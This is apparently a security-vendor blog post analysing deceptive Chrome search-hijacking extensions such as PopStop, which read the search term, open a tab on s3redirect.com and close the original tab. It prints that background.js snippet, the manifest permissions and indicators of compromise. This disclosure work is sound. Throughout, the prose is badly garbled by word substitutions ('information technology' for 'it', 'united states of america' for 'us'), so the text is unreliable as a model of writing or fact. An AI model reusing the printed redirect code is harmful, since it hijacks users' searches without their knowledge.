"But I checked the permissions before I installed this pop-upwardly-blocker—it said nothing nearly irresolute my searches," my dad retorts afterwards I scold him for installing nevertheless some other search-hijacking Chrome extension. Granted, they are non hard to remove, merely having to do information technology over and over is a nuisance. This is specially true because it tin be hard to observe out which of the Chrome extensions is the culprit if the browser starts acting up.

What happened?

Recently, we came across a family of search hijackers that are deceptive virtually the permissions they are going to employ in their install prompt. This extension, called PopStop, claims it tin can only read your browsing history. Seems harmless enough, right?

PopStop install message

The install prompt in the webstore is supposed to give you accurate information about the permissions the extension you are about to install requires. It already is habit for browser extensions to only ask for permissions needed to function properly up front—then ask for boosted permissions later on after installing. Why? Users are more than likely to trust an extension with express warnings or when permissions are explained to them.

But what is the use of these informative prompts if they only requite you half the story? In this case, the PopStop extension doesn't just read your browsing history, as the popular-up explains, but it also hijacks your search results.

Some of these extensions are more straightforward once the user installs them and they are listed under the installed extensions.

Niux APP extension

But others are consistent in their lies fifty-fifty after they have been installed, which makes it even harder to detect out which 1 is responsible for the search hijack.

PopStop extension

How is this possible?

Google had at some point decided to bar extensions that obfuscate their code. Past doing and then, information technology's easier for them to read the plug-in's programming and comport appropriate analysis.

The first step in determining what an extension is up to is in looking at the manifest.json file.

manifest.json

Registering a script in the manifest tells the extension which file to reference, and, optionally, how that file should behave.

What this manifest tells us is that the only active script is "background.js" and the alleged permissions are "tabs" and "storage". More about those permissions subsequently on.

The relevant parts in background.js are these pieces, considering they evidence united states of america where our searches are going:

          const BASE_DOMAIN = 's3redirect.com', pid = 9126, ver = 401; chrome.tabs.create({url: `https://${BASE_DOMAIN}/chrome3.php?q=${searchQuery}`});         setTimeout(() => {           chrome.tabs.remove(currentTabId);         }, 10);

This script uses two chrome.tabs methods: 1 to create a new tab based on your search query, and the other to close the electric current tab. The closed tab would have displayed the search results from your default search provider.

Looking at the chrome.tabs API, we read:

"You tin use almost chrome.tabs methods and events without declaring any permissions in the extension's manifest file. However, if you require admission to the url, pendingUrl, title, or favIconUrl properties of tabs.Tab, you must declare the "tabs" permission in the manifest."

And indeed, in the manifest of this extension we plant:

          "permissions": [ "tabs", "storage" ],

The "storage" permission does not invoke a message in the warning screen users see when they install an extension. The "tabs" permission is the reason for the "Read your browsing history" message. Although the chrome.tabs API might be used for different reasons, it can likewise be used to run into the URL that is associated with every newly-opened tab.

The extensions we found managed to avoid having to display the message, "Read and modify all your data on the websites yous visit" that would be associated with the "tabCapture" method. They did this by closing the current tab later on capturing your search term and opening a new tab to perform the search for that term on their ain site.

The "normal" permission warnings for a search hijacker would look more like to this:

The end issue is the same, simply an experienced user would be less likely to install this last extension, as they would either balk at the permission request or recognize the plug-in as a search hijacker by looking at these messages.

Are these extensions really lying?

Some might call information technology a lie. Some may say no, they simply didn't offer the whole truth. However, the signal of those permissions popular-ups is to give users the choice on whether to download a program by being upfront about what that programme asks of its users.

In the case of these Chrome extensions, then, allow's but say that they're not disclosing the total extent of the consequences of installing their extensions.

It might exist desirable if Google were to add together a possible bulletin for extensions that use the chrome.tabs.create method. This would inform the user that his extension volition be able to open up new tabs, which is 1 manner of showing advertisements so users would be fabricated aware of this possibility. And chrome.tabs.create besides happens to be the method that this extension uses to supersede the search results we were after with their own.

An boosted advantage for these extensions is the fact that they don't get mentioned in the settings menu as a "regular" search hijacker would.

A search hijacker that replaces your default search engine would be listed under Settings > Search engine

Not being listed equally the search engine replacement, again, makes it harder for a user to figure out which extension might exist responsible for the unexpected search results.

For the moment, these hijackers can be recognized by the new header they add to their search results, which looks like this:

This will probably change once their current domains are flagged equally landing pages for hijackers, and new extensions will exist created using other landing pages.

Farther details

These extensions intercept search results from these domains:

  • aliexpress.com
  • booking.com
  • all google domains
  • ask.com
  • ecosia.org
  • bing.com
  • yahoo.com
  • mysearch.com
  • duckduckgo.com

Information technology also intercepts all queries that contain the string "spalp2020". This is probably because that string is a common gene in the installer url's that vest to the powerapp.download family unit of hijackers.

Search hijackers

We have written earlier about the interests of shady developers in the billion-dollar search industry and reported on the unlike tactics these developers resort to in lodge to become users to install their extensions or use their search sites[i],[two],[iii].

While this family unit doesn't employ the well-nigh deceptive marketing practices out there, it still hides its bad behavior in plain sight. Many users have learned to read the install prompt messages carefully to determine whether an extension is prophylactic. It's disappointing that developers tin evade giving honest information and that these extensions make their way into the webstore over and again.

IOC's

extension identifiers:

pcocncapgaibfcjmkkalopefmmceflnh

dpnebmclcgcbggnhicpocghdhjmdgklf

search domains:

s3redirect.com

s3arch.page

gooogle.folio <= notation the actress "o"

Malwarebytes detects these extension under the detection name PUP.Optional.SearchEngineHijack.Generic.

Stay safe, everyone!